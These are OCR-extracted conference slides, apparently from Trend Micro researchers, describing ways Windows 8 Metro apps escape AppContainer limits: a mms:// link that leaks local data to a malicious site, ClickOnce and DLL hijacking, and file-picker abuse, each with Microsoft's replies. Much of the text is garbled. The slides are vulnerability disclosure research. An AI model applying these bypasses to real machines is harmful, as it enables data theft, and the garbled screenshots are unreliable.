Microsoft Corporation 

3.5.2234.0 




bcryptprimitives.dll Windows Cryptographic Primitives Ubrary 

Microsoft Corporation 

6.2.3250.0 



— 

CJ252NLS 







1 ptnmnrn fill r~.-i-.-fi.-ii ir-=.-H.-,i-. f.fl^nanar HI 1 


r, il i r r- ryTi P ^,n-^r=f+irhr-. 

C O RORfl n 





SB 


C, pb 




































































Hz'S t Hachi ne x -Ko51 User 
Executing Frocsescr 
Dsbuggce :s in. User 
Pebuggee is a li^e l 
Event T^pe Except ic 
EKcsption Faulting i 
Second Chance Except 
EKcsption Gub-Tppe: 

Faulting Instruction 


'UOJODM OCX 

?0b3Sb7S push eax 

Tainted Input Operands oax 

?0b35b?6 call dword ptr (ecx+18h) 

Tamtod Input Operands ccx StackContonts 


Basic Block: 

7Hri5bb 

Tainted Inpu 


IS nov eci» 


option Hash (Hod or ■'Hi nor) 0 xlc 2 f 2 c 0 & 0 x 320 S 657 c 


7Dbl5b?D lea cd» 
7Db35b74 push edK 

7 Obi j b7 b push eax 


Tainted Input Operands: eaK 
70bi5b7& call dwerd. ptr [ecx+10h] 

Tainted Input Operands' ecK. StackOcmtents 


Rescript ion I*ato fron Faulting Address controls Cod© F! 
SUoi t J-icxxption TsintedDstaContI'oisCod^Flov 

Exploitab-:i-v - f:r* *ion PR 08 ABLY_EXFL 0 ITABLE I 

Reconmended Bug Title Probably Exploitable - bar ti-n 

*EEm32 IBaseThreadlnitThunk+Oxe 


ntdl 1!_Rt iUeorlhr cadStor 14 0 tt4g 

ntdl11 RtlIlsErTkreflciBtart +Qxle 


r ki -1 ~^y r-t ~ i~iti u h h t i~ — - ■ m - ? nr n ~i n n n n ~ i k ^ ^i~ p r- 


^Dscription: Date EroR Faulting Address controls Code Flo" 

Bhor t Descx ip t j.aa . Tainf edDat aCan, t rol’sCpdeF law 
iKploit abi I it:-; Clessi f iceticm: FiW(MBL¥_EXPX0IT£RLE 

jpconmended Bu.g Title Frcbably Exploitable - D-aia trail Fau.lting Add-ress controls- Code Flaw at t icug at l u lmii I CIiiriers-irveQp 


The data Ixair. the faulting address a_s later used. as the target for a. branch. 






















ATTACK DESIGN LOGIC 





Mi TREND 

micro" 

BYPASS INTERNET CONNECTION 



















Bypass Internet Connection Limitation 



















MSRC: 

Such undesirable activities are highly 
detectable by either users or the AV 
industry, and once reported to 
Microsoft, we have the ability to 
remove the offending app from all user 
machines, thus protecting Windows 8 


users. 


Bypass Internet Connection Limitation 


Malicious site 


2. mms://Malicious site/ 


information?data=ab41 962ab 


No I nternet capa bility 

Metro App 

v_ ) 



1. Access local sensitive information 










fmi TREND 

micro" 

BYPASS LAUNCH PROGRAM LIMITATION 










Inline ASM and Shellcode 


is 


TREND 

M I C R O™ 




Process Explorer - Sysinternals: www.sysinternals.com [UserPC\User] 


_£ile Options View Process Find Handle Users 

dl ill a , n Hi I & *1 ft © 


Process 

0 


svchost.exe 
[i 7 dllhost.exe 
[i ’ RuntmneBroker.exe 
0 [i 7 AppC.exe 
E- Bgicmd.exe 

raiconhost.exe 
[5 7 hneBroker.exe 
[T 7 svchost.exe 
0 [T 7 svchost.exe 


Type 

Name 

ALPC Port 

\Sessions\1\A| 

Desktop 

\Default 

Directory 

\KnownDlls 

Directory 

\Sessions\1\^ 

File 

C:\Users\User' 

File 

C:\Windows\S 

File 

\Device\CNG 

File 

C:\Windows\S; 

Key 

HKLMXSYSTE! 

Key 

HKLM 

Key 

HKCU\Softwar | 

Key 

HKLM\S0FT1A 

Key 

HKLM\S0FTV\ 

Key 

HKCU 

Key 

HKLMXSYSTEI 

Key 

HKLM\S0FTV\ 

Key 

HKCR\Activat 2 

Key 

HKCU\Softwar | 


I I l/rn\ A -a:. .« 


CPU Usage: 10.26% 


ID 

CPU 

Private Bytes 

Working Set Description 

Company Name 

Integrity 

poo 

0.06 

2.176 K 

8.5% K Host Process for Win.. 

. Microsoft Corporation 

System 

424 


2.012 K 

12.112 K COM Surrogate 

Microsoft Corporation 

Medium 

m 


824 K 

4.968 K Runtime Broker 

Microsoft Corporation 

Medium 

140 


199.160 K 

211.836 K 


AppContainer 

D64 


1.444 K 

2.860 K Windows Command ... 

Microsoft Corporation 

AppContainer 

376 

0.03 

3.560 K 

18.268 K Console Wndow Host 

Microsoft Corporation 

/^ppContaner 

_ 


2.168 K 

12.528 K Microsoft IME2Q12, 

Microsoft Corooration 

Medium 


sa C:\Windows\system32\cmd.exe 


rs\User\Documents\Uisual Studio ll\Pro jects\AppC\Debug\AppC\AppX>f orfiles 

ami" 

exe" 

pdb" 

winmd" 

an ifest-xml" 
s" 

Page.xaml" 
n" 

soft-system-package.metadata" 

rces-pri" 

pxrecipe" 

rs\User\Documents\Uisual Studio ll\Projects\AppC\DebugNflppCNflppX>cd .. 
is denied. 

rs\User\Documents\Uisual Studio ll\Pro jects\AppC\Debug\AppC\AppX> 


Corporation 

i 


trol\OLEB2A63E2B2B9972E45FDB 


System 


valuation copy. Build 82 


















































TREND 

ClickOnce package (.Application/.xbap) 
is executable 


Application Install - Security Warning 



Publisher can pot be verified. 

Are you sure you want to install this application? 


Name: 

click 

From [Hover over the string below to see the full domain): 
10.1.144.115 

Publisher: 

Unknown Publisher 


Install 


Don't Install 


While applications from the Internet can be useful., they can potentially harm your computer. If 
you do not trust the source, do not install this software. More hfcrmat'O" 


































DLL Hijacking 



TREND 

MICRO" 


Process Explorer - Sysinternals: www.sysinternals.com [WinS\User] 




File Options View Process Find 

DLL Users Help 



afiaT* ®~n~« ar * 

*© __ ----- 

I A 

..f . .- . .--.-.- -.-.-.----- 


Process 

PID 

CPU 

Private Bytes 

Working Set Description 

Company Name 

Integrity 

Qvmtoolsd.exe 

3150 

Suspended 

15 432 K 

14,130 K VMwane Tools Core Service 

VMwane. Inc. 

Medium 

j# regedit.exe 

3424 


15,163 K 

14,540 K Registry Editor 

Microsoft Corporation 

High 

Bjj oleview.exe 

4034 


13,400 K 

12,376 K OLECOM Object Viewer 

Microsoft Corporation 

Medium 

□ jaicmd.exe 

5420 


1,624 K 

2.652 K Windows Command Processor Microsoft Corporation 

High 

BicQnhQst.exe 

5423 


1,072 K 

6,733 K Console Window Host 

Microsoft Corporation 

High 

pnocexp.exe 

5034 

3.57 

131,172 K 

214,320 K Sysinternals Process Explorer 

Sysinternals -www.sysinter. 

. High 

^ CO MRaider.exe 

4143 

<0.01 

13,324 K 

13,664 K 

iDefense.com 

High 

notepad.exe 

4212 


1,243 K 

3,234 K Notepad 

Microsoft Corporation 

Medium 

El ^ devenv.exe 

2538 

1.47 

135,312 K 

413,304 K Microsoft Visual Studio 2012 

... Microsoft Corporation 

Medium 

E [FI Microsoft .Visual Studio. Fe .. . 

4260 


24,316 K 

36,524 K Microsoft .Visual Studio. PerfW 

... Microsoft Corporation 

Medium 

Sjconhost.exe 

3600 


643 K 

4,233 K Console Window Host 

Microsoft Corporation 

Medium 

□ jjyjj MSBuild.exe 

1176 


20,644 K 

33,358 K MSBuild.exe 

Microsoft Corporation 

Medium 

jajconhost.exe 

32 


643 K 

4,234 K Console Window Host 

Microsoft Corporation 

Medium 

%. mmc .exe 

220 

0.23 

23,024 K 

12,612 K Microsoft Management Cons. 

.. Microsoft Corporation 

High 

0 

5258 


4,704 K 


Microsoft Corporation 

Medium yoTv vV 

iexplone.exe 

5324 


376 K 

5,312 K Internet Explorer 

Microsoft Corporation 

Low 


v | 



Name 

Description 

Company Name 

Version 

Path 

ROOOaOOOaaaaO.clb 




C :\Windows\Registration\R000000000006 .clb 

rpcrt4.dll 

Remote Procedure Call Runtime 

Microsoft Corporation 

6.2.8400.0 

C:\Windows\System32\rpcrt4.dll 

rsaenh.dll 

Microsoft Enhanced Cryptographic... 

Microsoft Corporation 

6234000 

C :\Windows\System32\isaenh .dll 

sechost.dll 

Host for SCM/SDDLASA Lookup ... 

Microsoft Corporation 

6.2.3400.0 

C :\Windows\Sy5tem32\sechost .dll 

secur32.dll 

Security Support Provider Interface 

Microsoft Corporation 

6.2.3400.0 

C :\WindQW"s\System32\secur32 .dll 

setupapi.dll 

Windows Setup API 

Microsoft Corporation 

6.2.3400.0 

C :\Windows\System32’ ! ssetupapi .dll 

SHCore.dll 

SHCORE 

Microsoft Corporation 

6234000 

C :\Windows\Sy stem32\S HCore .dll 

shell32.dll 

Windows Shell Common Dll 

Microsoft Corporation 

6.2.3400.0 

C :\Windows\System32\shell32 .dll 

shlwapi.dll 

Shell Light-weight Utility Lbrary 

Microsoft Corporation 

6234000 

C :\Windows\System32\shlwapi .dll 

SortDefault.nls 




C:\Windows\Globalization\Sorting\SortDefault.nls 

sqmapi.dll 

SQM Client 

Microsoft Corporation 

6284000 

C:\Pnogram FilesMntemet Exploner\sqmapi.dll 

sspicli.dll 

Security Support Provider Interface 

Microsoft Corporation 

6.2.34003 

C :\Windows\System32\sspidi .dll 

traceextn.dll 




C :\Users\User\Desktop’ v iraceextn .dll 

urimon.dll 

QLE32 Extensions for Win32 

Microsoft Corporation 

10.0.3400.0 

C :\Windows\System32\urimon .dll 

user32.dll 

Multi-User Windows USER API di... 

Microsoft Corporation 

6234000 

C:\Windows\Sy5tem32\user32.dll 

uxtheme.dll 

Microsoft UxTheme Library 

Microsoft Corporation 

6234000 

C :\Windows\System32\uxtheme .dll 

winhttp.dll 

Windows HTTP Services 

Microsoft Corporation 

6234000 

C :\Windows\System32\winhttp .dll 

wininet.dll 

Internet Extensions for Win32 

Microsoft Corporation 

10.0.3400.0 

C :\Windows\System32\wininet .dll 

winnsi.dll 

Network Store Information RPC int... 

Microsoft Corporation 

6.2.3400.0 

C :\Windows\System32\winnsi .dll 

ws2 32.dll 

Windows Socket 23 32-Bit DLL 

Microsoft Corporation 

6234000 

C:\Windows\System32\ws2 32.dll 


I CPU Usage: 3.32% Commit Charge: 36.07% Processes: 62 Physical Usage: 66.94% 



3:06 AM 
6/20/2012 
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MICRO' 


MSRC: 

(ClickOnce) 

ClickOnce problem will be fixed in next 
Windows 8 release. 

(DLL Hijacking) 

We would consider this type of exploit a 
vulnerability in the desktop applications 
rather than a vulnerability in the metro app 
or the platform. We continue to address DLL 
hijacking bugs in security updates as 
detailed in our security advisory for Insecure 
Library loading. 
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MICRO" 


BYPASS FILE/FOLDER ACCESS 

















Demo 
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FilePicker 


PickerHost.exe (the broker process) 

- The broker process 

- Medium permission 

- When user need to save / read files from some specific 
folder which is not specified in capability settings. 

Even you didn't grant file system access to App, the 
App still can use SavePickFile/PickFolder to let user 
choice folders they want to access, such as save a file in 
user-specified folders. 

After user clicking OK, the app can have full control of 
the folder with broker permission. 


Files - Desktop 

Go up Sort by name >✓ 


Libraries Bubbles2 


U se r by pass_AP P Co nta i ner6 


Computer ollydbg 

by pass_AP P Co nta i ner 







r 


l 


r 




by pass_AP PContai n er 


Cancel 






MSRC: 

This is a deliberate feature, and fully 
under the user's control. Users should 
not click "ok" to the File picker dialog if 
they do not want the app to have access 
to that folder tree. We consider this 
under the user's control and as such do 
not view it as a threat.. 


Conclusion 

• Introduced 

- Security design of AppContainer 

- The methodology of Metro style app vulnerability 
discovery 

- The issues we have discovered. 

• Security v.s. convenience, a never solved 
problem? 

• Do users really know what will happen after 
clicking 'OK'? 


Thanks! 


http://exploitspace.blogspot.com/ 


Contact: (nanika_pan | tt_tsai)@trend\.com\.tw 


